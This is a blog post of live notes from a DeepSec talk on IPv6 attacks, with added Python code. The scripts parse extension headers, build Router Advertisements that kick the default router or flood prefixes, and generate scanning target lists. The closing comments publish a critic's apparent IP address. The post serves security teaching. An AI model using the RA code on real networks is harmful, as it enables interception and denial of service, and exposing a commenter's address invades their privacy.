
Recent advances in IPv6 insecurity, Marc “van Hauser” Heuse (live notes from his talk at the DeepSec conference)
In a distant future… IPv6 will come. Maybe, hopefully never!!!
If you haven’t already realised it, IPv6 is already in your systems. The future is already here!
Providers are now having trouble obtaining IPv4 addresses, so IPv6 addresses are coming, slowly.
The biggest provider in Germany (Deutsche Telekom) is working on an IPv6 rollout in 2011.
Typical standard subnet for IPv6 is /64
Enough addresses for anybody!
IPv6 doesn’t do broadcasts any more, but there are multicast groups (link-local ones such as ff02::1, all nodes, and ff02::2, all routers)
This all means there are issues with scanning: a /64 has 2^64 possible host addresses, so a brute-force ping sweep is not feasible
Complete client autoconfiguration (SLAAC: the host builds its own address from a router advertisement, no DHCP server needed)
IPsec support is built in (mandated by the original specification, though not enabled by default)
IPv6 is a lot about visions of how things could be! Not sure if it will be everything yet.
What’s missing from the IPv6 header (compared with IPv4)
- No header length field (the base header is a fixed 40 bytes)
- No identification field
- No checksum (left to the upper layers; the ICMPv6, TCP and UDP checksums cover a pseudo-header with the addresses)
- No fragmentation fields (only end hosts fragment, via an extension header; routers never do)
- No options
Every option is an extension header of its own, chained behind the base header via the next-header field
- Fragmentation
- Source routing
- Destination options
- IPsec (AH, ESP)
- ….
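The chain of extension headers is what a stateless packet filter or IDS has to walk before it knows the transport protocol: a filter that only reads the next-header byte of the base header sees "Hop-by-Hop" and never finds the TCP SYN behind it. Here is an added example (my own code, not from the talk or the THC toolkit) of a minimal parser that walks the chain over constructed packets; the two sample packets and their addresses are built inline and are not captured traffic.

```python
import struct

# Next-header values (IANA protocol numbers) for the IPv6 extension headers.
HOPOPT, ROUTING, FRAGMENT, ESP, AH, DSTOPTS, NONEXT = 0, 43, 44, 50, 51, 60, 59
TCP = 6
EXT_HEADERS = {HOPOPT: "Hop-by-Hop", ROUTING: "Routing", FRAGMENT: "Fragment",
               AH: "AH", DSTOPTS: "Destination Options"}


def parse_ipv6(pkt: bytes):
    """Walk the extension-header chain of one IPv6 packet.

    Returns (info, upper_layer_protocol, payload_offset). The base header is a
    fixed 40 bytes with no options, so the transport protocol is only known
    after following every next-header field. upper_layer_protocol is None for
    a non-first fragment, whose transport header lives in another packet.
    """
    if len(pkt) < 40:
        raise ValueError("truncated IPv6 header")
    vtf, payload_len, nh, hop_limit = struct.unpack("!IHBB", pkt[:8])
    if vtf >> 28 != 6:
        raise ValueError("not an IPv6 packet")
    info = {"payload_len": payload_len, "hop_limit": hop_limit,
            "src": pkt[8:24], "dst": pkt[24:40], "chain": []}
    off = 40
    while nh in EXT_HEADERS:
        if off + 8 > len(pkt):
            raise ValueError("truncated extension header")
        info["chain"].append(EXT_HEADERS[nh])
        if nh == FRAGMENT:
            # Fixed 8 bytes: next header, reserved, offset(13 bits)+res+M flag, id.
            nxt, _, off_flags, frag_id = struct.unpack("!BBHI", pkt[off:off + 8])
            info["fragment"] = {"offset": off_flags >> 3,
                                "more": bool(off_flags & 1), "id": frag_id}
            if off_flags >> 3:
                return info, None, off + 8
            hlen = 8
        elif nh == AH:
            # AH length is in 32-bit words, minus 2 (RFC 4302).
            nxt, ahlen = pkt[off], pkt[off + 1]
            hlen = (ahlen + 2) * 4
        else:
            # Hop-by-Hop, Routing, Destination Options: length in 8-octet
            # units, not counting the first 8 octets (RFC 2460 / RFC 8200).
            nxt, extlen = pkt[off], pkt[off + 1]
            hlen = (extlen + 1) * 8
        off += hlen
        nh = nxt
    # ESP (50) and No Next Header (59) also end the walk; ESP hides what follows.
    return info, nh, off


SRC = "20010db8000000000000000000000001"   # constructed sample addresses
DST = "20010db8000000000000000000000002"


def _ipv6(src_hex, dst_hex, first_nh, payload):
    hdr = struct.pack("!IHBB", 6 << 28, len(payload), first_nh, 64)
    return hdr + bytes.fromhex(src_hex) + bytes.fromhex(dst_hex) + payload


def build_syn_with_ext_headers() -> bytes:
    """Constructed sample: Hop-by-Hop -> Destination Options -> TCP SYN to port 80."""
    hbh = bytes([DSTOPTS, 0, 1, 4, 0, 0, 0, 0])      # next=60, len=0, PadN(4)
    dopts = bytes([TCP, 0, 1, 4, 0, 0, 0, 0])        # next=6,  len=0, PadN(4)
    syn = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, 5 << 4, 0x02, 65535, 0, 0)
    return _ipv6(SRC, DST, HOPOPT, hbh + dopts + syn)


def build_second_fragment() -> bytes:
    """Constructed sample: a non-first fragment (offset 1 = 8 bytes in) of a TCP segment."""
    frag = struct.pack("!BBHI", TCP, 0, (1 << 3) | 0, 0x1234)
    return _ipv6(SRC, DST, FRAGMENT, frag + b"\x00" * 8)


def transport_port(pkt: bytes):
    """Destination port a filter should match on, or None if it cannot tell."""
    info, proto, off = parse_ipv6(pkt)
    if proto == TCP and off + 4 <= len(pkt):
        return struct.unpack("!H", pkt[off + 2:off + 4])[0]
    return None


if __name__ == "__main__":
    for p in (build_syn_with_ext_headers(), build_second_fragment()):
        info, proto, off = parse_ipv6(p)
        print(info["chain"], "->", proto, "at offset", off, "port", transport_port(p))
```

The second sample is the case filters get wrong most often: a non-first fragment carries no transport header at all, so the only safe answer is "unknown", not "allow".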
IPv6 is much simpler than IPv4 (or at least it seems that way)
The creators did not learn from the historical issues of IPv4
Many, many CVE numbers already

First presented in 2005
There were no tools…
So one was created: the THC IPv6 Attack Toolkit
- Neighbor Discovery
  - ARP spoofing isn’t possible any more, but spoofed ICMPv6 Neighbor Advertisements do the same job
- Neighbor Solicitation
  - Duplicate Address Detection (DAD) DoS: answer every DAD solicitation on the link and no new host can ever configure an address (similar to DHCP exhaustion attacks)
- MITM with ICMPv6 redirects
- DHCP => Autoconfiguration
  - Uses Router Advertisements (RAs) instead of a DHCP server
  - Lets a host pick its own address
- Kick the default router
  - Spoof an RA from the legitimate router with a router lifetime of 0, which removes it as default gateway
  - Then send your own RA and become the default router
- Send an RA => systems become dual stack
  - Some systems are just waiting for an RA packet to enable IPv6
  - These systems will then prefer IPv6 over IPv4, routed via whoever sent the RA
- RA flooding
  - IPv6 is designed for hosts to have multiple addresses
  - But what happens when you advertise 10,000 prefixes?
  - 100% CPU
  - 100% RAM
  - Cisco, Windows, old Linux, …
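As an added example (my own code, not part of the talk and not the THC toolkit’s implementation), here is what the two RA attacks above look like at the byte level: a Router Advertisement with router lifetime 0 which, sent from the real router’s link-local address, removes it from every host’s default-router list, and a generator of RAs each carrying a fresh /64 prefix for the flooding case. Packets are built and parsed offline; the link-local address, MAC and prefixes are made-up sample values. Sending them with a forged source address needs a raw link-layer socket (AF_PACKET on Linux) where you also supply the Ethernet and IPv6 headers; the bytes below are the ICMPv6 layer only, which is what the checksum covers.

```python
import ipaddress
import struct

ICMPV6_ROUTER_ADVERT = 134
IPPROTO_ICMPV6 = 58
ALL_NODES = ipaddress.IPv6Address("ff02::1")   # link-local all-nodes multicast


def icmpv6_checksum(src, dst, payload: bytes) -> int:
    """RFC 4443 checksum over pseudo-header (src, dst, length, next header) + payload.
    Returns 0 when run over a packet whose checksum field is already correct."""
    pseudo = src.packed + dst.packed + struct.pack("!IxxxB", len(payload), IPPROTO_ICMPV6)
    data = pseudo + payload
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def prefix_option(net, valid=2592000, preferred=604800) -> bytes:
    """Prefix Information option (type 3, 32 bytes) with L and A flags set, so
    hosts treat the prefix as on-link and autoconfigure an address from it."""
    net = ipaddress.IPv6Network(net)
    return (struct.pack("!BBBBIII", 3, 4, net.prefixlen, 0xC0, valid, preferred, 0)
            + net.network_address.packed)


def build_ra(src: str, router_lifetime: int, prefixes=(), src_mac=None) -> bytes:
    """ICMPv6 Router Advertisement to ff02::1 from link-local address src.

    router_lifetime 0 means "I am not a default router": hosts that had src as
    default gateway drop it at once. A non-zero lifetime (seconds) installs src
    as a default router.
    """
    src_ip = ipaddress.IPv6Address(src)
    # type, code, checksum (0 for now), cur hop limit, M/O flags, router lifetime,
    # reachable time, retrans timer
    body = struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERT, 0, 0, 64, 0,
                       router_lifetime, 0, 0)
    for p in prefixes:
        body += prefix_option(p)
    if src_mac:                        # Source Link-Layer Address option (type 1)
        body += bytes([1, 1]) + bytes.fromhex(src_mac.replace(":", ""))
    csum = icmpv6_checksum(src_ip, ALL_NODES, body)
    return body[:2] + struct.pack("!H", csum) + body[4:]


def parse_ra(src: str, pkt: bytes):
    """Verify the checksum and return (router_lifetime, [advertised prefixes])."""
    src_ip = ipaddress.IPv6Address(src)
    if len(pkt) < 16 or pkt[0] != ICMPV6_ROUTER_ADVERT:
        raise ValueError("not a Router Advertisement")
    if icmpv6_checksum(src_ip, ALL_NODES, pkt) != 0:
        raise ValueError("bad ICMPv6 checksum")
    lifetime = struct.unpack("!H", pkt[6:8])[0]
    prefixes, off = [], 16
    while off + 2 <= len(pkt):
        typ, length = pkt[off], pkt[off + 1]
        if length == 0:
            raise ValueError("zero-length ND option")   # RFC 4861: discard the packet
        if typ == 3:
            prefixes.append("%s/%d" % (ipaddress.IPv6Address(pkt[off + 16:off + 32]),
                                       pkt[off + 2]))
        off += length * 8
    return lifetime, prefixes


def kill_default_router(router_ll: str) -> bytes:
    """RA that kicks router_ll (the legitimate router's link-local address, sample
    value in the usage below) out of every host's default-router list."""
    return build_ra(router_ll, 0)


def ra_flood(count: int, src: str = "fe80::1", base: str = "2001:db8::"):
    """Yield `count` RAs, each advertising a different /64 under the sample base prefix."""
    base_int = int(ipaddress.IPv6Address(base))
    for i in range(count):
        yield build_ra(src, 1800, [ipaddress.IPv6Network((base_int + (i << 64), 64))])


if __name__ == "__main__":
    pkt = kill_default_router("fe80::1")
    print(pkt.hex(), parse_ra("fe80::1", pkt))
    print(sum(len(p) for p in ra_flood(10000)), "bytes of RA flood")
```

The parser is also the detection side of this: an RA arriving from a link-local address that is not your router’s, or one carrying a lifetime of 0 for the router you expect, is exactly what RA Guard on a switch, or a sniffer on the segment, should be alerting on.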
Remote ping sweeps of IPv6 networks are not possible (van Hauser, 2005)
But there are options
Identify remote systems through:
- Search engines / Databases
- DNS
- Common addresses
With this we can identify SOME systems…
There are a number of common host addresses, based on what has been seen on the Internet in testing. The most common host address is ::1 (i.e. prefix::1)
Host address analysis: how are host addresses assigned?
- Autoconfiguration
  - From the MAC address (EUI-64: the MAC with ff:fe inserted in the middle and the universal/local bit flipped)
  - Privacy extensions (random and changing)
  - Fixed random
  - Check similar MAC addresses: same vendor, consecutive serial numbers, different system!
- By hand
  - Common patterns: ::1, ::2, ::3 …
  - ::service_port (e.g. ::80 for a web server, typed as hex digits)
  - The IPv4 address embedded in the host part (e.g. ::192:168:1:10)
- DHCP
In total we can find around 66% of systems using these methods currently; this could be raised to 70-75% with more tuning
DNS brute-forcing alone (with a 1900-word list) finds 90% of systems
Alive (address) brute-forcing finds 66% of systems
Combined (and with use of the brain) you can find 90-95% of the systems
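Turning the address-assignment observations above into a candidate list is the core of what an “alive” scanner does. As an added example (my own code, not the talk’s or the THC toolkit’s), the script below derives EUI-64 addresses from known and neighbouring MACs, adds the by-hand patterns (low numbers, hex-typed service ports, embedded IPv4 addresses) and classifies observed addresses by how they were probably assigned. The /64 prefix, MAC and IPv4 address are made-up sample inputs, and the port list is my guess at what admins type; the function only produces the list, the actual probing (ICMPv6 echo, or TCP to a known port) is left to whatever tool you feed it to.

```python
import ipaddress

COMMON_PORTS = (21, 22, 25, 53, 80, 110, 143, 443, 8080)   # assumed admin habits


def eui64_from_mac(prefix: str, mac: str) -> ipaddress.IPv6Address:
    """SLAAC address: MAC split in two, ff:fe inserted, universal/local bit flipped."""
    b = bytearray(bytes.fromhex(mac.replace(":", "").replace("-", "")))
    if len(b) != 6:
        raise ValueError("need a 48-bit MAC")
    b[0] ^= 0x02
    iid = bytes(b[:3]) + b"\xff\xfe" + bytes(b[3:])
    net = ipaddress.IPv6Network(prefix)
    return ipaddress.IPv6Address(int(net.network_address) | int.from_bytes(iid, "big"))


def mac_neighbours(mac: str, span: int = 16):
    """MACs with the same OUI and a serial within +/- span: same vendor batch,
    so often the same purchase order and the same subnet."""
    base = int(mac.replace(":", "").replace("-", ""), 16)
    oui = base >> 24
    for delta in range(-span, span + 1):
        cand = base + delta
        if delta == 0 or cand < 0 or cand >> 24 != oui:
            continue
        yield ":".join("%02x" % ((cand >> s) & 0xFF) for s in range(40, -1, -8))


def candidate_addresses(prefix: str, known_macs=(), ipv4s=(), low=1, high=32,
                        ports=COMMON_PORTS):
    """Return {IPv6Address: reason} for a /64, in the order worth probing."""
    net = ipaddress.IPv6Network(prefix)
    base = int(net.network_address)
    cands = {}
    for i in range(low, high + 1):                     # ::1, ::2, ::3 ...
        cands.setdefault(ipaddress.IPv6Address(base | i), "sequential")
    for port in ports:                                 # ::80 typed as hex digits
        cands.setdefault(ipaddress.IPv6Address(base | int(str(port), 16)), "service-port")
    for v4 in ipv4s:
        octets = [int(x) for x in v4.split(".")]
        groups = 0                                     # "::192:168:1:10", one group per octet
        for o in octets:
            groups = (groups << 16) | int(str(o), 16)
        cands.setdefault(ipaddress.IPv6Address(base | groups), "ipv4-groups")
        packed = int.from_bytes(bytes(octets), "big")  # "::c0a8:10a", packed 32-bit form
        cands.setdefault(ipaddress.IPv6Address(base | packed), "ipv4-embedded")
    for mac in known_macs:                             # seen on the wire, in DNS, ...
        cands.setdefault(eui64_from_mac(prefix, mac), "eui64")
        for near in mac_neighbours(mac):
            cands.setdefault(eui64_from_mac(prefix, near), "eui64-neighbour")
    return cands


def classify(addr: str) -> str:
    """Guess how an observed address's host part (IID) was assigned."""
    iid = int(ipaddress.IPv6Address(addr)) & ((1 << 64) - 1)
    if (iid >> 24) & 0xFFFF == 0xFFFE:
        return "eui64"                                 # ff:fe in the middle of the IID
    if iid < 0x10000:
        return "by-hand"                               # ::1, ::80, small numbers
    if iid >> 32 == 0:
        return "ipv4-embedded-or-counter"              # only the low 32 bits are used
    return "random-or-privacy"


if __name__ == "__main__":
    cands = candidate_addresses("2001:db8::/64", known_macs=["00:11:22:33:44:55"],
                                ipv4s=["192.168.1.10"])
    print(len(cands), "candidates; first few:")
    for a, why in list(cands.items())[:5]:
        print(" ", a, why)
    for a in ("2001:db8::211:22ff:fe33:4455", "2001:db8::80", "2001:db8::c0a8:10a"):
        print(a, "->", classify(a))
```

Run `classify` over the addresses you already know (DNS results, one host seen on the wire) and you learn which strategy the site uses; feed that back into `candidate_addresses` with the right MAC or IPv4 seeds and the hit rate climbs the way the percentages above describe.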
Multicast (MLD, Multicast Listener Discovery)
- The querier router sends periodic MLD general queries, and listeners answer with reports
- You can send a spoofed MLD Done message to take a system out of a group, but the router confirms with a group-specific query and the system simply re-reports (that spoils the party)
- So the attacker has to become the querier router
- Spoof the querier for the target (the querier with the lowest address wins the election)
- If your system then stops sending MLD general queries, the original router will resume sending after its timeout
- By sending with a specific destination MAC address you can deliver the MLD query only to the router and not to the target
Is anybody sniffing?
- A bug found in Linux in 2008
- Re-discovered in IPv6 recently
Side-channel attacks in IPv6! IPv6 IS a side channel
IPv6 is complex, and the more you look into it, the more complex it becomes
Finding interesting bugs that actually matter in IPv6 is easy
Join in and research IPv6
Links:
- Talk synopsis –> HERE
- THC IPv6 Attack Toolkit –> HERE
- ipv6security.info
- ipv6hacking.info
This article is full of nonsense. If you don’t understand IPv6, don’t talk about it.
Well, thanks for popping by, and thanks for your constructive feedback. I always love it when people are too scared to give their name when leaving posts. It makes me truly appreciate that the internet is full of useless things.
I’d like to point out that these are live notes written from the IPv6 talk at the DeepSec conference and not something I created. It’s also not an article.
Still, I’m sure if people surf over to networkconcepts.nl (89.106.161.124) they can get much better info. You are obviously the expert on all things IPv6!
Might I also suggest that if you don’t like it, you move along! I write this blog and these notes for people who have respect and aren’t idiots!